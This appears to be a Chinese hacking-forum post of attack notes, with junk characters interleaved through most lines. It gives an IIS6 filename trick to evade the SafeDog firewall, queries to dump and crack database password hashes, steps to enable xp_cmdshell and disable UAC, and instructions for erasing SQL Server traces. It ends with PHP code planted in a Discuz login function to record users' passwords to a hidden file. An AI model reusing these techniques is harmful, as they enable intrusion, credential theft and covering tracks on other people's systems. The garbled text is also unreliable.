. ?1 o0 J, [1 l. P在它下面直接插入即可,记录的密码生成在pwd.txt中,
( T+ A# N* X& x# v- M7 K9 K其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
" ~9 ^7 u$ h1 I/ U+ w0 k利用II6文件解析漏洞绕过安全狗代码:
+ @" n* S7 c: ?;antian365.asp;antian365.jpg/ m2 \+ A  V9 x1 I6 ], ^* f! @- r' Z

" |; x( b" J9 g5 M各种类型数据库抓HASH破解最高权限密码!
( S; z, l3 K* j' h. u1.sql server2000( N& R% Z3 i+ y$ P, a
SELECT password from master.dbo.sysxlogins where name='sa'0 w8 C, ]* ?- ?% w( E5 f, @; m
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
6 f: _3 f( }7 _4 h) H6 E2FD54D6119FFF04129A1D72E7C3194F7284A7F3A2 R( s! ~5 ~) n+ Z

2 u; V' Y8 L5 @. ]0×0100- constant header1 M0 x% c' ^! U2 M. m
34767D5C- salt% ~- H$ u1 r# x% L# k
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
3 c1 D" M" U7 L. L2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
6 J' T4 P: |, s/ g# c5 g$ S5 fcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
, d4 j6 M: z+ G8 y; U4 d' Y- m/ Y5 S4 kSQL server 2005:-* t$ `! R  k0 @7 r% @
SELECT password_hash FROM sys.sql_logins where name='sa'2 X9 ~/ I- f+ A- ?! L) H
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
3 j" Z' f5 D, }; U) \6 L: a; n- B* f0×0100- constant header
9 o  K4 e  Q7 F5 D: [993BF231-salt
+ \' |+ I: S! @+ E9 E! m5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
9 Q6 S6 G' M& l/ W) \+ ]crack case sensitive hash in cain, try brute force and dictionary based attacks.) Y& @: ]: D% k
+ S+ r- \: `, T$ T
update:- following bernardo’s comments:-$ q1 q# u" t& E. ?
use function fn_varbintohexstr() to cast password in a hex string.2 R% _' H  q7 e7 c( t" z0 i5 E
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& t6 B/ ~$ \- Y/ g, z  b) o& {; {9 p" V1 P) o3 o  N. M7 ^
MYSQL:-
# N7 i7 q5 y, u1 U2 A" G7 n, D3 E3 Z, _9 R
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.! S6 g9 x2 B* |* j
$ Y  }4 F0 e: X1 u* o* l3 j
*mysql  < 4.12 S0 a) S; D: w! `$ S
# w5 {  l+ c6 b& e% n
mysql> SELECT PASSWORD(‘mypass’);. f' h3 ]# n) k7 e6 ^' _* g
+——————–+: _4 m- z/ j% v# O( G
| PASSWORD(‘mypass’) |
. L5 D6 s1 b" K+——————–+
( P  _7 a; F! F7 R, @* b* U| 6f8c114b58f2ce9e   |
: M; `' e7 Y% T+——————–+
& M# H, Y& W9 u$ Z/ `6 b3 ]0 ?/ q" T' ^, P" F- s0 e7 ~
*mysql >=4.1
; L, h6 V) i7 |( `3 S& R; Y. H8 D/ x: c3 V; H! \4 W4 k
mysql> SELECT PASSWORD(‘mypass’);
8 E4 r' N! g. w3 N8 n. d- z+——————————————-+
7 h/ A0 G! q2 I4 W+ w; x| PASSWORD(‘mypass’)                        |
( U$ X, ^: g* y9 u5 W. D+——————————————-+
$ F3 ~- ?7 ~4 j5 o3 ^| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |& Y" |0 Y+ l1 G" M9 k
+——————————————-+
" D8 s. J) ^$ y. h. V- f# E. n- p* V) d( y% Z, r7 f" u( M
Select user, password from mysql.user. A, ~/ K1 y5 U: ^1 f& Y4 O' k5 Y% T* L
The hashes can be cracked in ‘cain and abel’$ k( W! J2 K* Y* `

* C2 f& u4 D5 _4 aPostgres:-" M6 [; j' g' y' X3 S
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
# l: q* _+ V$ |select usename, passwd from pg_shadow;
3 L/ O; \- B* q8 l( R1 Ousename      |  passwd, m5 W0 ^5 n/ D
——————+————————————-: O8 g0 n! [1 A, \4 I; ]4 ~
testuser            | md5fabb6d7172aadfda4753bf0507ed4396; y# p1 l; q9 k! V
use mdcrack to crack these hashes:-9 ~8 i4 @; B& O& }
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
# ]5 o3 q( f% Z9 e9 K' q5 Q$ l/ c  h+ G3 v8 a* k
Oracle:-0 \8 L+ H- w) b  o
select name, password, spare4 from sys.user$- a5 A+ a& l2 Q% j' k
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
7 f* ?1 q4 j; W( ]3 f7 aMore on Oracle later, i am a bit bored….$ @4 A& @- O" R' d$ F6 }2 Q
  h, p' @# H8 W5 R2 a

  i1 G9 S0 @" J1 z% c$ r. V/ A1 v在sql server2005/2008中开启xp_cmdshell
: v# v, l' u0 H2 l& n) b8 n-- To allow advanced options to be changed.
" e! ]( z1 H  _- S/ `& KEXEC sp_configure 'show advanced options', 1
" _4 e8 [7 t' J3 FGO
0 l5 y5 Q2 [1 m8 {-- To update the currently configured value for advanced options.
5 U  T+ p- G) v5 D$ w& PRECONFIGURE
" r( U! s7 X0 ^; N; c, h# b, RGO
' u! ~7 i! x& |2 Z* n" q  ]$ H7 Z-- To enable the feature.8 W! _% l! U0 q8 `
EXEC sp_configure 'xp_cmdshell', 1
$ ^6 \, J: }2 O7 \GO: ]5 M# }! c! C# A& q
-- To update the currently configured value for this feature.) C& e5 h' [* T& w( G
RECONFIGURE7 O5 \6 c# u* s4 i; T  h
GO& ^" }& h7 J/ l+ E# O1 u9 r; t
SQL 2008 server日志清除,在清楚前一定要备份。& k6 y/ r5 b5 F# ]! O( c% d' L7 z
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:$ f2 ~  @6 _- [* F! S, y2 @
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin5 |! R8 Y% ~' ^& K& J( i- ?
4 W' r6 C2 V4 n  m: s
对于SQL Server 2008以前的版本:9 p4 _. u; i: a! A
SQL Server 2005:
" _7 Q, P$ \" {8 O+ A* W  U8 L8 h删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
8 [6 v) s% e" K* Y. pSQL Server 2000:
" J4 \* N. [4 M) F5 Y1 V清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
8 C, e7 Y, W( c# ?* S& i: a* @
: y9 F7 P# H; |7 m' A' r0 i$ j% O本帖最后由 simeon 于 2013-1-3 09:51 编辑
0 S' S5 F% M- ~/ w! O) ~! V3 s. M! P
/ [5 r' v/ a6 @1 x
7 M* e/ ]: r9 S$ V! R8 _, f: e9 qwindows 2008 文件权限修改
: Y: ?, E$ k% o  Y1 @  f1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 _. V/ p9 O8 o  L2 e) g; K2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
8 f. x# O* [) d一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,+ |, q: ?! m% T  D. W! H
1 V0 T% E5 C2 J# ~
Windows Registry Editor Version 5.00
4 ^3 p( T9 r+ }/ y  `. f4 f[HKEY_CLASSES_ROOT\*\shell\runas]
& M% V) L. R+ O- r  N7 p@="管理员取得所有权", D* W0 b( L. k/ [8 s
"NoWorkingDirectory"=""
0 V  a" N) e+ s7 f1 R0 R, h[HKEY_CLASSES_ROOT\*\shell\runas\command]/ y! A7 D5 t/ V; |6 n% b* Z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"( G$ F0 T* n$ o+ b
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": g5 f5 J% |3 U% j. u- F$ w
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
8 [' r2 }1 h9 O( H: w@="管理员取得所有权"# t6 v, D' p) p9 E& F7 p0 s8 C
"NoWorkingDirectory"=""
! r! P+ q& m0 w. i[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]" T7 |) z$ {: R
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"9 d- B5 }2 o( A5 j$ M; u0 K
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 c4 _9 i9 c1 q2 k% N; v

1 l6 G! }0 I) ?6 a. }- h[HKEY_CLASSES_ROOT\Directory\shell\runas]
4 p! E, a8 k8 |8 @$ i1 K/ }@="管理员取得所有权"
# j/ O8 a5 n- ?( Q, d; C"NoWorkingDirectory"=""- B0 I2 Y/ k, ^: y4 v2 d" q: w
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
3 H  n0 {- ^9 [' V9 k@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"# V, I- `; Q6 S1 |$ d3 G
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
! q& U7 I. a9 C+ r" ?% A: Z4 s7 E  a5 i0 M

$ r6 ~0 z; Q2 r% C  ?+ hwin7右键“管理员取得所有权”.reg导入
/ |# l' ^) H7 v& F二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
1 c. v+ v& k6 I1、C:\Windows这个路径的“notepad.exe”不需要替换' o8 p& y: }; w. a# _
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换2 }( W& M4 f8 A
3、四个“notepad.exe.mui”不要管
7 `5 k/ p7 q  ?1 i% `4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
0 Z( k$ J& `, B' k3 S$ XC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
" Z1 W% Z+ H* ^* h替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. m+ g/ N' J' e; M# {. Z& R( n5 Y替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
! x, [6 n9 D% D5 A4 Uwindows 2008中关闭安全策略: ; W% S! [! e2 n' b2 I  d3 K) ^$ F
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f# i) o. i8 ~7 i1 f, M& ]4 C( a
修改uc_client目录下的client.php 在
5 d1 c! d: B: g( b' ~8 Zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
, T" t& C/ N( x. T下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ h4 y" o$ M: R  s6 b- P你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw3 S- l. ^$ E$ X  v
if(getenv('HTTP_CLIENT_IP')) {" r" a% D7 x& g# C3 v
$onlineip = getenv('HTTP_CLIENT_IP');  ~. o' H$ A; T& D) U8 o! L
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {" J: P" L& y% w
$onlineip = getenv('HTTP_X_FORWARDED_FOR');; I$ b+ o5 d/ T3 D, v) j
} elseif(getenv('REMOTE_ADDR')) {3 ?7 \# N6 w  \
$onlineip = getenv('REMOTE_ADDR');- \8 P; y: X) s+ ~# ~3 v* U2 G
} else {
. o( l7 n% T1 b# Y0 p# X: C$ Z$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];3 J. H. K' {+ T+ a' C
}/ L+ H4 Y- G8 [
     $showtime=date("Y-m-d H:i:s");
, u6 F- g* i# y8 ?0 [8 C    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
, G8 M4 C! {% S$ @7 P    $handle=fopen('./data/cache/csslog.php','a+');: s3 E, S. o7 J+ K' H, y2 W
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表